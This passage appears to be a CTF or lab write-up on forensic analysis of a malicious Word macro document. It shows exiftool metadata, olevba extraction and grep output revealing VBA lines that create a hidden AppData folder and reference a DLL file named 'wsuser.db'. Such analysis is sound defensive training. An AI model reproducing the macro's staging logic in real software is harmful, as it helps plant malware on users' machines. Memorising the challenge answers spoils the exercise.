File Type                       : DOC
File Type Extension             : doc
MIME Type                       : application/msword
Identification                  : Word 8.0
Language Code                   : English (US)
Doc Flags                       : Has picture, 1Table, ExtChar
System                          : Windows
Word 97                         : No
Title                           : 
Subject                         : 
Author                          : Mickey
Keywords                        : 
Comments                        : 
Template                        : Normal.dotm
Last Modified By                : Challenger
Software                        : Microsoft Office Word
Create Date                     : 2020:04:24 03:18:00
Modify Date                     : 2021:10:18 13:06:00
Security                        : None
Code Page                       : Windows Latin 1 (Western European)
Company                         : 
Char Count With Spaces          : 32
App Version                     : 16.0000
Scale Crop                      : No
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
Title Of Parts                  : 
Heading Pairs                   : Title, 1
Comp Obj User Type Len          : 32
Comp Obj User Type              : Microsoft Word 97-2003 Document
Last Printed                    : 0000:00:00 00:00:00
Revision Number                 : 83
Total Edit Time                 : 37 minutes
Words                           : 4
Characters                      : 29
Pages                           : 1
Paragraphs                      : 1
Lines                           : 1

Task 10 Answer: Mickey

Task 11: Who last modified the above document?

Exiftool output above.

Task 11 Answer: Challenger

Task 12: Analyze the “17.dotm” document. What is the directory where a suspicious folder was created? (Format: Give the path starting immediately after . Please pay attention to placeholder.)

For this one, I’m going to use a package called OleTools and a specific tool called olevba.

$ olevba --decode 17.dotm > macros.txt

This exports a long file (~325 lines) that is formatted pretty well. The line we want is

workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice"

Task 12 Answer: \AppData\Local\Microsoft\Notice

Task 13: Which suspicious file was checked for existence in that directory?

I did this probably a caveman way, but knowing that this directory is stored in the variable workDir, I searched the file for workDir. Then I noticed that it is checking for a file in that directory stored in the binName variable. So I searched the file again to find where binName was defined. Bingo.

$ cat macros.txt | grep workDir
    workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice"
    If Not FolderExist(workDir) Then
        MkDir (workDir)
    dllPath = workDir & "\" & binName
        workDir = workDir & "\" & binDir
        If Not FolderExist(workDir) Then
            MkDir (workDir)
        dllPath = workDir & "\" & binName
                                                                             
$ cat macros.txt | grep binName  
    binName = "wsuser.db"
    dllPath = workDir & "\" & binName
        dllPath = workDir & "\" & binName

Task 13 Answer: wsuser.db

That’s it. Some good stuff here practicing ATT&CK research, Virus Total research, and some Macro Virus investigation. Any questions, let me know!